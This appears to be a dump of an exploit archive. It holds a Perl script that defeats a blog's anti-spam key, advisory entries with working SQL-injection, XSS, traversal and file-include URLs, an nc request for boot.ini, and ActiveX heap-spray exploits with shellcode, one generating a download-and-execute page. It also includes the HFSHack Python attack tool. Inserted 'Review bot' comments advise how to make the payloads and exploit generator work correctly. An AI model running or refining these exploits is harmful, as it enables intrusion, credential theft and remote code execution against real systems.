my $author = $ARGV[1];
my $email = $ARGV[2];
my $comment = $ARGV[3];
my $mech = WWW::Mechanize->new( autocheck => 1 );
$mech->get($url);
# WWW::Mechanize doesn't support javascript, so the field
comment_spambamKey won't be
# recognized by $mech->field. Thus, I'll make an update_html adding the
field, and for
# this purpose I save first the original contents. Indeed, substitition
occurs via the
# javascript callback function "extractKey"
$tmpContent = $mech->content;
# Eliminate carriage returns to apply sed. Later I'll have to restore
them
# to execute the javascript code, as not every line is semicolon
terminated.
# That's the reason of the __WHO_BAMS_WHO__ string.
$_ = $mech->content;
s/\n/__WHO_BAMS_WHO__/g;
# Extract the javascript code and the name of the variable where the key
is going to be calculated
/<script type="text\/javascript">(.*)document\.write\('<input
type="hidden" name="comment_spambamKey" value="'\+(.*)\+'">'\);/g;
$javascriptCode = $1;
$spamBamKey = $2;
# Add the javascript instruction which will comunicate the key to the
perl code.
$javascriptCode .= "\nextractKey($spamBamKey);";
my $js = JavaScript::SpiderMonkey->new();
$js->init(); # Initialize Runtime/Context
# Define perl callback for extracting the key from the javascript code
$js->function_set("extractKey", sub { $tmpContent =~ s/<\/form>/<input
type=\"hidden\" name=\"comment_spambamKey\" value=\"@_\"><\/form>/; });
# Restore Carriage returns and execute javascript code
$javascriptCode =~ s/__WHO_BAMS_WHO__/\n/g;
my $rc = $js->eval($javascriptCode);
$js->destroy();
# Process form
$mech->update_html( $tmpContent );
$mech->form_number(1);
$mech->field("author", $author);
$mech->field("email", $email);
$mech->field("comment", $comment);
$mech->submit();
printf("Check it. Comment should have been added\n");

11
platforms/php/webapps/31034.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27323/info
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to MyBB 1.2.11 are vulnerable.
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe

11
platforms/php/webapps/31035.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27335/info
Clever Copy is prone to multiple input-validation vulnerabilities, including two SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Clever Copy 3.0; other versions may also be affected.
http://www.example.com/cc/postcomment.php?ID=&#039;/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*
http://www.example.com/cc/gallery.php?album=&#039;/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*
http://www.example.com/cc/gallery.php?album=<script>alert(&#039;xss&#039;)</script>
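Review bot: The three PoC URLs carry `&#039;` at the points where the injection needs a literal apostrophe (`ID='/**/union/**/select…`, `album='/**/union…`, `alert('xss')`); this looks like HTML entity-encoding picked up when the advisory text was rendered rather than part of the payload, and anyone copying the lines verbatim will send a harmless `&#039;` to the target. Storing the file with the raw `'` would let the PoC reproduce as written. The same artefact appears in the other advisories in this commit that quote apostrophes, so it is worth checking the batch rather than this file alone.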


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27346/info
phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
http://www.example.com/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27346/info
phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
http://www.example.com/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

20
platforms/php/webapps/31041.txt Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/27361/info
bloofoxCMS is prone to a directory-traversal vulnerability, a SQL-injection vulnerability, and an authentication-bypass vulnerability.
The SQL-injection vulnerability occurs because the application fails to sufficiently sanitize user-supplied data to the 'username' parameter of the 'class_permissions.php' script before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The authentication-bypass vulnerability stems from a lack of input-validation mechanisms in the 'system/class_permissions.php' file. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The directory-traversal vulnerability occurs because the application fails to properly sanitize user-supplied input data to the 'file' parameter of 'file.php'. The attacker's input would consist of '../' directory-traversal sequences. Successful exploits could allow the attacker to access the contents of potentially sensitive files on the affected computer. Information obtained may help the attacker launch other attacks against the system.
bloofoxCMS 0.3 is vulnerable to these issues; previous versions may be affected as well.
Username: admin' or 1=1 /*
Password: something
An example for the directory-traversal vulnerability was provided:
GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27382/info
singapore Modern template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default.
http://www.example.com/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27383/info
Small Axe Weblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable.
http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com

11
platforms/php/webapps/31048.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27397/info
PacerCMS is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect versions prior to PacerCMS 0.6.1.
NOTE: To exploit these issues, the attacker may require 'staff member' access.
http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27401/info
DeluxeBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects DeluxeBB 1.1; other versions may also be vulnerable.
http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27459/info
Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?option="'><IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>&Itemid=12


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27460/info
The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
http://www.example.com/user/index.php?"><script>alert('xss')</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27460/info
The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
http://www.example.com/maint/index.php?"><script>alert('xss')</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27461/info
WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
http://www.example.com/pref.php?>&#039;"><script>alert(&#039;XSS&#039;)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27461/info
WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
http://www.example.com/search.php?adv=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27462/info
F5 BIG-IP Application Security Manager is prone to a cross-site scripting vulnerability because the web management interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects F5 BIG-IP Application Security Manager 9.4.3; other versions may also be vulnerable.
https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27470/info
The MOStlyCE module for Mambo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27471/info
ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27472/info
The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27473/info
eTicket is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/"><script>alert('XSS')</script>


@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/27341/info
CORE FORCE Firewall and Registry modules are prone to multiple local kernel buffer-overflow vulnerabilities because the software fails to adequately verify user-supplied input.
Local attackers can exploit these issues to cause denial-of-service conditions. Attackers may also be able to escalate privileges and execute arbitrary code, but this has not been confirmed.
These issues affect versions up to and including CORE FORCE 0.95.167.
All the vulnerabilities can be reproduced by running a combination of
DC2 and BSODHook tools.
Step by step instructions:
- Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
- Login as unprivileged user.
- Run "dc2 /hct /a".
- Get BSODHook.exe from Matousec
http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php
- Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
probe list" and then "GO".


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27358/info
BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27360/info
Surveillix DVR 'MeIpCamX.DLL' ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
These issues affect 'MeIpCamX.DLL' 1.0.0.4; other versions may also be vulnerable.
<!-- Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote buffer overflow exploit (IE7/xpsp2) a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab rgod-tsid-pa-he-ru-ka - stay tuned with us ... http://retrogod.altervista.org/join.html security feeds, radio streams, techno/drum & bass stations to come --> <html> <object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' /> </object> <script language="javascript"> ///add su one, user: sun pass: tzu shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + 
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<444;i++){memory[i] = block+shellcode} //thx to Solar Designer and metasploit crew, is always intended puf=""; for (i=0;i<28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself </script> </html>


@ -0,0 +1,80 @@
source: http://www.securityfocus.com/bid/27393/info
GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable.
//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
const char* script1 = \
"<html><body><object id=\"sb\" classid=\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 300; x++) memory[x] = block + shellcode;"
"var zhen = '\\x0a';"
"while (zhen.length < 4057) zhen += '\\x0a\\x0a\\x0a\\x0a';"
"sb.ChatRoom = zhen;"
"</script>"
"</body>"
"</html>";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
return -1;
}
FILE *file = fopen("knell.html", "w+");
if ( file == NULL )
{
printf("create 'knell.html' failed!\n");
return -2;
}
fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
fprintf(file, "%s", script2);
fclose(file);
printf("make 'knell.html' successed!\n");
return 0;
}
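Review bot: In the second loop of `main`, `argv[1][j]` and `argv[1][j + 1]` are plain `char`, so on a signed-char target any byte at or above 0x80 in the URL is sign-extended to a negative `int` before `%02X` and prints as eight hex digits, which corrupts the `%uXXXX` escape the page-side `unescape` expects (the shellcode loop is unaffected because that array is `unsigned char`). Cast both operands: `fprintf(file, "%%u%02X%02X", (unsigned char)argv[1][j + 1], (unsigned char)argv[1][j]);`. A URL of odd length makes the last pair pick up the NUL terminator as its high byte, which is in bounds and merely embeds `%u00XX`, so that case needs no change. Separately, the usage string printed when `argc != 2` is mis-encoded (`jÖʽçlobalLink`) and should be re-saved as plain ASCII so the banner reads correctly.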

334
platforms/windows/remote/31056.py Executable file

@ -0,0 +1,334 @@
source: http://www.securityfocus.com/bid/27423/info
HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue.
A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
#!/usr/bin/python
"""
----------------------------------------------------------------
HFSHack 1.0b (By Felipe M. Aragon And Alec Storm )
----------------------------------------------------------------
* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
* CVE-2008-0410 - Information Disclosure Vulnerability
Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-template.txt
* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-log.txt
* CVE-2008-0407 - Username Spoofing Vulnerability
* CVE-2008-0408 - Log Forging / Injection Vulnerability
Affected Versions: HFS 1.5g to and including 2.3(Beta Build
174); and possibly HFS version 1.5f
http://www.syhunt.com/advisories/hfs-1-username.txt
Vulnerabilities found by Syhunt (http://www.syhunt.com)
Sandcat can also identify these issues:
http://www.syhunt.com/sandcat
"""
import urllib2, sys, re, commands, StringIO, string, base64
host = '127.0.0.1' # Default Host
help = ('\n'
'open [hostname]\n'
' This should be called first (unless you want the default host)\n\n'
'checkdos\n'
' Performs the Log DoS Attack (Makes the server crash)\n\n'
'checkxss\n'
' Checks for the presence of the Template XSS Vulnerability\n\n'
'manipf [localfilename] [remotefilename]\n'
' Appends content of a local file to a remote file. Examples:\n'
' manipf inject.html index.html or ..\\..\index.html\n'
' Note: If the file does not exists, it will be created.\n\n'
'maniplog [localfilename]\n'
' Injects content of a local file to the HFS log panel and file\n\n'
'mkd [dirname]\n'
' Creates directories. Examples:\n'
' mkd Test or ..\\..\\Windows\\Test\n\n'
'symbols\n'
' Forces HFS to reveal details about the server\n\n'
'ver\n'
' Forces HFS to show its version and build, and displays which\n\n'
' HFSHack commands are available for it\n'
'quit\n'
' Exits this application'
'\r\n')
readme = (
'(c) 2008 Syhunt Security. All rights reserved.\n\n'
'This tool is provided ''as-is'', without any expressed or implied\n'
'warranty. In no event will the author be held liable for any\n'
'damages arising from the use of this tool.\n\n'
'Permission is granted to anyone to use this tool, and to alter\n'
'it and redistribute it freely, subject to the following\n'
'restrictions:\n\n'
'1. The origin of this tool must not be misrepresented, you must\n'
' not claim that you wrote the original tool.\n\n'
'2. Altered source versions must be plainly marked as such, and\n'
' must not be misrepresented as being the original plugin.\n\n'
'3. This notice may not be removed or altered from any source\n'
' distribution.\n\n'
'If you have any questions concerning this license, please email\n'
'contact _at_ syhunt _dot_ com\n'
)
about = (
'----------------------------------------------------------------\n'
' Syhunt HFSHack 1.0b\n'
'----------------------------------------------------------------\n\n'
'This exploit tool should be used only by system administrators\n'
'(or other people in charge).\n\n'
'Type "readme" and read the text before continuing\n\n'
'If you have already read it, type "help" to view a list of\n'
'commands.'
)
# Extra Details to Obtain
symbol_list = (
'connections;Current number of connections to HFS',
'timestamp;Date and time of the server',
'uptime;Uptime',
'speed-out;Current outbound speed',
'speed-in;Current inbound speed',
'total-out;Total amount of bytes sent',
'total-downloads;Total amount of bytes sent',
'total-hits;Total Hits',
'total-uploads;Total Uploads',
'number-addresses;Current number of connected clients (IPs)',
'number-addresses-ever;Number of unique IPs ever connected',
'number-addresses-downloading;Current number of downloading clients (IPs)',
)
# Affected Versions
re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)'
re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])'
# Common Messages
msg_par_mis = 'Parameter(s) missing.'
msg_done = 'Done.\n'
msg_acc_file = 'Error reading local file (file not found):'
msg_help = 'Type "help" to view a list of commands.'
msg_err_con = 'Error Connecting:'
msg_fail = 'Failed.'
msg_req_ok = 'Request accepted.'
uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)';
path = '/' # Default Path
def dorequest(hpath,auth_data,s_msg,f_msg):
globals()["rcvd"] = ''
globals()["banner"] = ''
url = 'http://'+host+hpath
try:
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', uagent)]
if auth_data != '':
opener.addheaders = [('Authorization', 'Basic '+auth_data)]
globals()["rcvd"] = opener.open(url).readlines()
if 'server' in opener.open(url).headers:
globals()["banner"] = opener.open(url).headers['server']
except Exception, msg:
if f_msg != '':
print f_msg,msg
return False
else:
if s_msg != '':
print s_msg
return True
def genbase64str(string):
base64str = base64.encodestring(string);
base64str = base64str.replace("\n","")
return base64str
def readlocalfile(filename):
file = open(filename, "r")
text = file.readlines()
file.close()
print text
filecontentstr = ''
for l in text:
filecontentstr = filecontentstr+l
return filecontentstr
def ishostavailable():
return dorequest(path,'','',msg_err_con)
def getservinfo(symbol,desc):
base64str = base64.encodestring('<id>%'+symbol+'%</id>');
if dorequest(path,base64str,'',msg_err_con):
for l in rcvd:
hfsver = re.findall('<id>(.*?)</id>', l)
for r in hfsver:
if r != []:
hfsverdec = urllib2.unquote(hfsver[0])
if desc != '':
print desc+': '+hfsverdec
return hfsverdec
else:
return ''
def getallservinf():
for l in symbol_list:
curl = l.split(';')
getservinfo(curl[0],curl[1])
def hfsmkdir(dirname):
base64str = genbase64str('\\..\\'+dirname+'\\')+'AA';
dorequest(path,base64str,msg_req_ok,msg_fail)
def shutdownhfs():
dosstr = genbase64str('a' * 270 + ':')
if dorequest(path,dosstr,msg_fail,'DoS executed.'):
dorequest(path,'','Host is still up.','Host is now down.')
def hfsappendtofile(filename,string):
base64str = genbase64str('\\..\\'+filename)+'AA';
dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail)
def hfsinjecttolog(string):
base64str = genbase64str(string);
dorequest('/',base64str,msg_req_ok,msg_fail)
def procparams(cmd):
try:
if len(cmd) > 0:
if cmd[1] != []:
globals()["host"] = cmd[1]
except:
print "No target info provided. Using localhost"
def checkxss():
if ishostavailable():
curver = getservinfo('version','')
if curver != '':
return 'XSS Found'
else:
return 'Not Vulnerable'
else:
return msg_fail
def isbanner(regex):
p = re.compile(regex)
m = p.match(banner)
return m
def showacceptedcmds():
cmds = 'None (This server is not vulnerable)';
if isbanner(re_200801161):
cmds = 'checkxss symbols ver'
if isbanner(re_200801162):
cmds = cmds+' manipf mkd checkdos'
if isbanner(re_200801163):
cmds = cmds+' maniplog'
print '\nAvailable commands for this server:'
print ' '+cmds+'\n'
